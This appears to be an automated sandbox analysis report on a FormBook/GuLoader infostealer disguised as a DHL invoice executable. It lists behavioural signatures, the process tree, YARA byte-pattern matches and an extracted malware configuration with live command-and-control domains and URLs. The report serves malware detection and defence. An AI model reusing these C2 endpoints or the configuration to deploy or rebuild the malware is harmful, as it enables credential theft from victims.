Edit tour

Windows Analysis Report
DHL-INVOICE-MBV.exe

Overview

General Information

Sample Name:	DHL-INVOICE-MBV.exe
Analysis ID:	730960
MD5:	97516ce29dc27c8eeb9f7b38d4611577
SHA1:	0e7a754c301f2b4043e40d2fd7076dd776103e12
SHA256:	54ed2a73c16c51669b59fb94d88f8e488ada1a53138559dd6c3c00c590bd3a5d
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

DHL-INVOICE-MBV.exe (PID: 6028 cmdline: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe MD5: 97516CE29DC27C8EEB9F7B38D4611577)

DHL-INVOICE-MBV.exe (PID: 4144 cmdline: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe MD5: 97516CE29DC27C8EEB9F7B38D4611577)

RAVCpl64.exe (PID: 7188 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

WWAHost.exe (PID: 1436 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 7C7EDAD5BDA9C34FD50C3A58429C90F0)

explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

firefox.exe (PID: 6560 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.driftreiki.com/d0ad/"], "decoy": ["xZcu1T4gVLlododyl8ihkHs=", "3/6XOfLQ7pOM8os6NQ==", "N9zpjFUQKdfVU1V69VcB", "O0JA95Nnfx0JeJI9pS1Kwpue", "YSSrXAHYBpWGt4U1Rpxz/PL8mfcpa0A=", "jTVkEQR5nXee", "nqG1XaKGnI8CPtHq", "upIavXRVcQQdxpd69VcB", "8fsZ1DcSPHkAq0poRY8tRyY63jyWWjlP6Q==", "Eurugn81UFfDZQAhPmlKwpue", "YEVTC0MfVpVCX3SRLpZTqQ==", "ypLGYBn3A3AFqzqj/XE=", "yI2+a5g+T/jg43UaNw==", "xtR+Jte1uw3z16paqRCqvnj+nAY=", "46RM9UE6cpwZrj/4PpdUqQ==", "qFRoCsuW3O9c+KN69VcB", "gUbahykBUX03Wzqj/XE=", "v1KEo3jeigSGsdA=", "ADvt98Yx3iEPNQ==", "mJmkTZuDjXzKg1R5XXw348svGe9Hv/V1", "jzI+0YJokP+r0q9Vg/iNe5sFx7VK", "4rLsh2TNT0ySD+P9", "qXwatu3O/DxJBuL/", "cuTsjlc1Zfq5sD+o0s2hvg==", "gR65auPtIYSzq80=", "GeDynZJIYlF13neg63daQhE3tQ==", "FdZ/IEUjRTqHPVV69VcB", "fULbjy7hCegdqTqj/XE=", "zcbce2wwdrpvp4q+72g=", "eVpuDiEdVTyHCaJ69VcB", "TjNYAfLU/q2Wm35rl8ihkHs=", "XCXRe+/lEYSzq80=", "O0jgfRsXX+q13bphkMihkHs=", "TvZ1Ip17tTcymutXPw==", "xsvkhbqjt6LIN/0rjMihkHs=", "W0rql0lBeyMvmutXPw==", "qEvVjhP6KIxHQuOR4jhMYmI=", "0rCIb/Sq6xs=", "4OWJMLWcBkLKaIoYC2Y=", "6PqoPos/jm7FIg==", "S0hqEj/wCoSzq80=", "sKrEa39Tgq8iw42EsjEFMxc68vwe3Q==", "qIuwRAPgF7apEnMWNw==", "kHahSCPK9A+S+xqItzYJ", "S8P9Hum10fSSD+P9", "6sbqlr+r6R3IAc1GM2ozh/s0vQ==", "bT/Vi0AjIVnAYwjiRIEY", "9aOxXltPgUdyHegHMqtDh/s0vQ==", "6u1/H6aAvkU3mutXPw==", "0n0TxCnW/KedtUmzuhk0HNLO9AQ=", "KzZC/3rvO6pD7sU=", "v7hODQO4y9RD9dDv5cihkHs=", "YVphEopldqMIqTqj/XE=", "tca9b/XsLppJWzqj/XE=", "oo4Qt29SiTIyVeaIq/DFSk3Fm6hA", "mkddCv3oLi+XLYoYC2Y=", "YhTJcIAyWIMiT25nl8ihkHs=", "MxakXTsQJwaSD+P9", "MEBkBQDgDtsQjxwJDVtKwpue", "RT3JbR/gAdv+kVdVVKOKxn6U", "VGH9nVJAfkNKw9NqbrZZh/s0vQ==", "tngVwjnv/2MkTmNZj8ihkHs=", "T8o8F+dJ3iEPNQ==", "maZ+aJVKntJQ4tm8qaLU99jyqg=="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0b9:$sqlite3step: 68 34 1C 7B E1 0xbc31:$sqlite3step: 68 34 1C 7B E1 0xb0fb:$sqlite3text: 68 38 2A 90 C5 0xbc76:$sqlite3text: 68 38 2A 90 C5 0xb112:$sqlite3blob: 68 53 D8 7F 8C 0xbc8c:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x78cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xeda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfd9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.17788417365.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0b9:$sqlite3step: 68 34 1C 7B E1 0xbc31:$sqlite3step: 68 34 1C 7B E1 0xb0fb:$sqlite3text: 68 38 2A 90 C5 0xbc76:$sqlite3text: 68 38 2A 90 C5 0xb112:$sqlite3blob: 68 53 D8 7F 8C 0xbc8c:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x78cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xeda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfd9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0b9:$sqlite3step: 68 34 1C 7B E1 0x1ac31:$sqlite3step: 68 34 1C 7B E1 0x1a0fb:$sqlite3text: 68 38 2A 90 C5 0x1ac76:$sqlite3text: 68 38 2A 90 C5 0x1a112:$sqlite3blob: 68 53 D8 7F 8C 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dda7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa89f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17dd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Process Memory Space: DHL-INVOICE-MBV.exe PID: 4144	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xbef7e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: WWAHost.exe PID: 1436	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3d85c:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ad225:$a1: 3C 30 50 4F 53 54 74 09 40 0x289ce1:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 27 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DHL-INVOICE-MBV.exe	Virustotal: Detection: 27%			Perma Link
Source: DHL-INVOICE-MBV.exe	ReversingLabs: Detection: 30%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.budgaugh.com/d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0	Avira URL Cloud: Label: malware
Source: http://www.yumfechy.online/d0ad/	Avira URL Cloud: Label: malware
Source: http://www.budgaugh.com/d0ad/	Avira URL Cloud: Label: malware
Source: http://www.yumfechy.online/d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0	Avira URL Cloud: Label: malware

Source: 10.0.explorer.exe.13cc3814.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.firefox.exe.e283814.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.WWAHost.exe.324e1e0.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.firefox.exe.e283814.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13cc3814.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13cc3814.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13cc3814.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.WWAHost.exe.4313814.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.firefox.exe.e283814.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.driftreiki.com/d0ad/"], "decoy": ["xZcu1T4gVLlododyl8ihkHs=", "3/6XOfLQ7pOM8os6NQ==", "N9zpjFUQKdfVU1V69VcB", "O0JA95Nnfx0JeJI9pS1Kwpue", "YSSrXAHYBpWGt4U1Rpxz/PL8mfcpa0A=", "jTVkEQR5nXee", "nqG1XaKGnI8CPtHq", "upIavXRVcQQdxpd69VcB", "8fsZ1DcSPHkAq0poRY8tRyY63jyWWjlP6Q==", "Eurugn81UFfDZQAhPmlKwpue", "YEVTC0MfVpVCX3SRLpZTqQ==", "ypLGYBn3A3AFqzqj/XE=", "yI2+a5g+T/jg43UaNw==", "xtR+Jte1uw3z16paqRCqvnj+nAY=", "46RM9UE6cpwZrj/4PpdUqQ==", "qFRoCsuW3O9c+KN69VcB", "gUbahykBUX03Wzqj/XE=", "v1KEo3jeigSGsdA=", "ADvt98Yx3iEPNQ==", "mJmkTZuDjXzKg1R5XXw348svGe9Hv/V1", "jzI+0YJokP+r0q9Vg/iNe5sFx7VK", "4rLsh2TNT0ySD+P9", "qXwatu3O/DxJBuL/", "cuTsjlc1Zfq5sD+o0s2hvg==", "gR65auPtIYSzq80=", "GeDynZJIYlF13neg63daQhE3tQ==", "FdZ/IEUjRTqHPVV69VcB", "fULbjy7hCegdqTqj/XE=", "zcbce2wwdrpvp4q+72g=", "eVpuDiEdVTyHCaJ69VcB", "TjNYAfLU/q2Wm35rl8ihkHs=", "XCXRe+/lEYSzq80=", "O0jgfRsXX+q13bphkMihkHs=", "TvZ1Ip17tTcymutXPw==", "xsvkhbqjt6LIN/0rjMihkHs=", "W0rql0lBeyMvmutXPw==", "qEvVjhP6KIxHQuOR4jhMYmI=", "0rCIb/Sq6xs=", "4OWJMLWcBkLKaIoYC2Y=", "6PqoPos/jm7FIg==", "S0hqEj/wCoSzq80=", "sKrEa39Tgq8iw42EsjEFMxc68vwe3Q==", "qIuwRAPgF7apEnMWNw==", "kHahSCPK9A+S+xqItzYJ", "S8P9Hum10fSSD+P9", "6sbqlr+r6R3IAc1GM2ozh/s0vQ==", "bT/Vi0AjIVnAYwjiRIEY", "9aOxXltPgUdyHegHMqtDh/s0vQ==", "6u1/H6aAvkU3mutXPw==", "0n0TxCnW/KedtUmzuhk0HNLO9AQ=", "KzZC/3rvO6pD7sU=", "v7hODQO4y9RD9dDv5cihkHs=", "YVphEopldqMIqTqj/XE=", "tca9b/XsLppJWzqj/XE=", "oo4Qt29SiTIyVeaIq/DFSk3Fm6hA", "mkddCv3oLi+XLYoYC2Y=", "YhTJcIAyWIMiT25nl8ihkHs=", "MxakXTsQJwaSD+P9", "MEBkBQDgDtsQjxwJDVtKwpue", "RT3JbR/gAdv+kVdVVKOKxn6U", "VGH9nVJAfkNKw9NqbrZZh/s0vQ==", "tngVwjnv/2MkTmNZj8ihkHs=", "T8o8F+dJ3iEPNQ==", "maZ+aJVKntJQ4tm8qaLU99jyqg=="]}

Source: DHL-INVOICE-MBV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: DHL-INVOICE-MBV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WWAHost.pdb source: DHL-INVOICE-MBV.exe, 00000003.00000002.18125827391.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18117164589.00000000000C1000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18120240513.000000001D5AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: WWAHost.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000002.18125827391.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18117164589.00000000000C1000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.18120240513.000000001D5AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000003.17961194797.000000001D406000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.17967006381.000000001D5BD000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18125076626.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18130223781.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL-INVOICE-MBV.exe, DHL-INVOICE-MBV.exe, 00000003.00000003.17961194797.000000001D406000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000003.17967006381.000000001D5BD000.00000004.00000800.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18125076626.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18130223781.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp
